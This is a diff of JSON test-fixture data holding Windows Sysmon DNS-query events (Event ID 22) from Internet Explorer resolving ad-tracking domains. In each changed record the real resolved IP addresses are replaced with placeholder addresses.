@@ { "@timestamp": "2021-05-05T15:30:51.706Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:37.18.16.16;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5183,7 +5183,7 @@ "ProcessId": "2736", "QueryName": "dm.hybrid.ai", "QueryStatus": "0", - "QueryResults": "::ffff:37.18.16.16;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", @@ -5214,7 +5214,7 @@ "ProcessId": "2736", "QueryName": "static.adsafeprotected.com", "QueryStatus": "0", - "QueryResults": "type: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -5241,7 +5241,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5253,7 +5253,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5265,7 +5265,7 @@ "ProcessId": "2736", "QueryName": "trc.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;", + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -5295,7 +5295,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:107.178.254.65;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5317,7 +5317,7 @@ "ProcessId": "2736", "QueryName": "pippio.com", "QueryStatus": "0", - "QueryResults": "::ffff:107.178.254.65;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "opcode": "Info", @@ -5337,7 +5337,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5354,7 +5354,7 @@ "ProcessId": "2736", "QueryName": "pixel-sync.sitescout.com", "QueryStatus": "0", - "QueryResults": "type: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;" + "QueryResults": "type: 5 pixel-a.sitescout.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;" }, "user": { "identifier": "S-1-5-18" @@ -5387,7 +5387,7 @@ "ProcessId": "2736", "QueryName": "prod.y-medialink.com", "QueryStatus": "0", - "QueryResults": "::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", @@ -5409,7 +5409,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.202.217;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693010700Z'/\u003e\u003cEventRecordID\u003e153\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.502\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprod.y-medialink.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5427,7 +5427,7 @@ "time_created": "2019-07-18T03:34:04.693Z", "level": "information", "event_data": { - "QueryResults": "type: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;", + "QueryResults": "type: 5 jadserve.postrelease.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.507", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5451,7 +5451,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ejadserve.postrelease.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 jadserve.postrelease.com.akadns.net;::ffff:54.80.117.178;::ffff:3.217.22.176;::ffff:35.153.215.15;::ffff:52.207.54.164;::ffff:52.204.186.237;::ffff:52.86.46.105;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.693021600Z'/\u003e\u003cEventRecordID\u003e154\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.507\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData 